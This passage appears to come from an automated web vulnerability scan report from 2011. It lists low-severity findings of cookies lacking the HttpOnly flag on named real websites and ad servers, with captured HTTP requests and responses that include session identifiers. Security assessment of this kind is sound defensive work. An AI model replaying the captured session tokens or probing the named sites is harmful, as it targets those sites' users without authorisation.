GET /resources/webinars/e-commerce/pci-compliance-demystified.php?gclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:45:13 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=9e713970eaa1e4a66f527fc3b1a40f5c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 58628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

15.49. http://www.firstdata.com/en_us/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.firstdata.com
Path:   /en_us/home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en_us/home HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:00:16 GMT; Path=/
Set-Cookie: JSESSIONID=9CF9D615DB62042608CEC3BBFAC41004; Path=/
Via: 1.1 firstdata.com
Content-Length: 25962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Home
...[SNIP]...

15.50. http://www.genbook.com/bookings/booknowjstag.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.genbook.com
Path:   /bookings/booknowjstag.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=1000 HTTP/1.1
Host: www.genbook.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:43:48 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: JSESSIONID=1svklbmve2bqs.cb2;Path=/bookings
X-UA-Compatible: IE=7
Content-Length: 876


var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck
...[SNIP]...

15.51. http://www.genbook.com/bookings/serviceprovider/30010843/logo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.genbook.com
Path:   /bookings/serviceprovider/30010843/logo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookings/serviceprovider/30010843/logo HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.genbook.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:43 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Tue, 26 Apr 2011 12:59:43 GMT
Content-Type: image/jpeg
Set-Cookie: JSESSIONID=osxco9rc5dgs.cb1;Path=/bookings
X-UA-Compatible: IE=7
Content-Length: 42858

......JFIF.....H.H.....[Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS2 Macintosh.2007:05:25 22:31:18.......
...[SNIP]...

15.52. http://www.genbook.com/bookings/serviceprovider/30010944/logo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.genbook.com
Path:   /bookings/serviceprovider/30010944/logo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookings/serviceprovider/30010944/logo HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.genbook.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:14 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Tue, 26 Apr 2011 13:01:14 GMT
Content-Type: image/jpeg
Set-Cookie: JSESSIONID=1qj66h5mnv6z7.cb2;Path=/bookings
X-UA-Compatible: IE=7
Content-Length: 47104

......JFIF.....H.H......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

15.53. http://www.hugthecloud.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:27 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT
Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT
X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe
X-XN-XNHTML: false
Date: Tue, 26 Apr 2011 12:39:16 GMT
Date: Tue, 26 Apr 2011 12:39:16 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/html; charset=utf-8
Server: Ning HTTP Server 2.0
Content-Length: 54058

<!DOCTYPE html>
<html lang="en">
<head data-layout-view="default">
<script>(function(){var d={date:8,app:"s",host:"s",ip:4,ua:"s",user:"s",url:"s",html:4,css:4,render:4,js:4,nlr:4,nlr_eval
...[SNIP]...

15.54. http://www.hugthecloud.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xn_visitor=367ebb41-9a4a-4792-a848-e329e8f51d58; ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFBsMRGdDlgSH6V+jaPEOm0Y=; 2__utmz=^ning.1319591918512:85044224.1303823919.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmv=^ning.1303823918511:; 2__utma=^ning.1366895918512:85044224.1282109851.1303823919.1303823919.1303823919.1; 2__utmc=^ning.1366895918512:85044224; 2__utmb=^ning.1303825718512:85044224.1.10.1303823919; xn_track=rp%252C%25252F%252Crc%252C0%252Csi%252C1303823924%252Cse%252C1303824824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:42 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFGef0Np4Of2wCuLXfA8BPNs=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:42 GMT
X-XN-Trace-Token: 1e53f0bd-ed7d-431f-993e-ef218725020a
ETag: "db9c1-483-45a88f5754cc0"
Date: Tue, 26 Apr 2011 12:36:52 GMT
Date: Tue, 26 Apr 2011 12:36:52 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 31 Oct 2008 09:09:47 GMT
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: image/x-icon
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 1155

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

15.55. http://www.m8security.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.m8security.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=2q12tlg89jgpaked26837s8347; expires=Thu, 19 May 2011 03:18:39 GMT; path=/; domain=.m8security.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 23:45:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...

15.56. http://www.net-address.co.uk/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.net-address.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.net-address.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 26 Apr 2011 13:47:59 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 7085
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDSACCR=GAGMHKNCJEJNEBOJPOEOAIIF; path=/
Cache-control: private

<html>
<head>
<title>Net-Address UK and international domain name registration including .com and .co.uk, with control panel management</title>
<meta http-equiv="content-type" content="text/html; c
...[SNIP]...

15.57. http://109.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3A%2F%2Fservedby.flashtalking.com%2Fclick%2F16008%3B128708%3B94221%3B230%3B3%2F%3Furl%3Dhttp:%2F%2Fresponse.firstdata.com%2F%3FelqPURLPage%3D15 HTTP/1.1
Host: 109.xg4ken.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=2c557654-692b-10a8-2a58-00004d95d016; expires=Sun, 24-Jul-2011 23:44:03 GMT; path=/; domain=.xg4ken.com
Location: http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.58. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3896
Date: Tue, 26 Apr 2011 14:21:07 GMT

_289667_amg_acamp_id=166308;
_289667_amg_pcamp_id=69114;
_289667_amg_location_id=55367;
_289667_amg_creative_id=289667;
_289667_amg_loaded=true;
var _amg_289667_content='<script type="text/javascript"
...[SNIP]...

15.59. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1258184&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!#8!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsXA!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsXA!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsXA!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#9!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsXA!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsXA!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsXA!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsXA!#wGj!!!!#<wl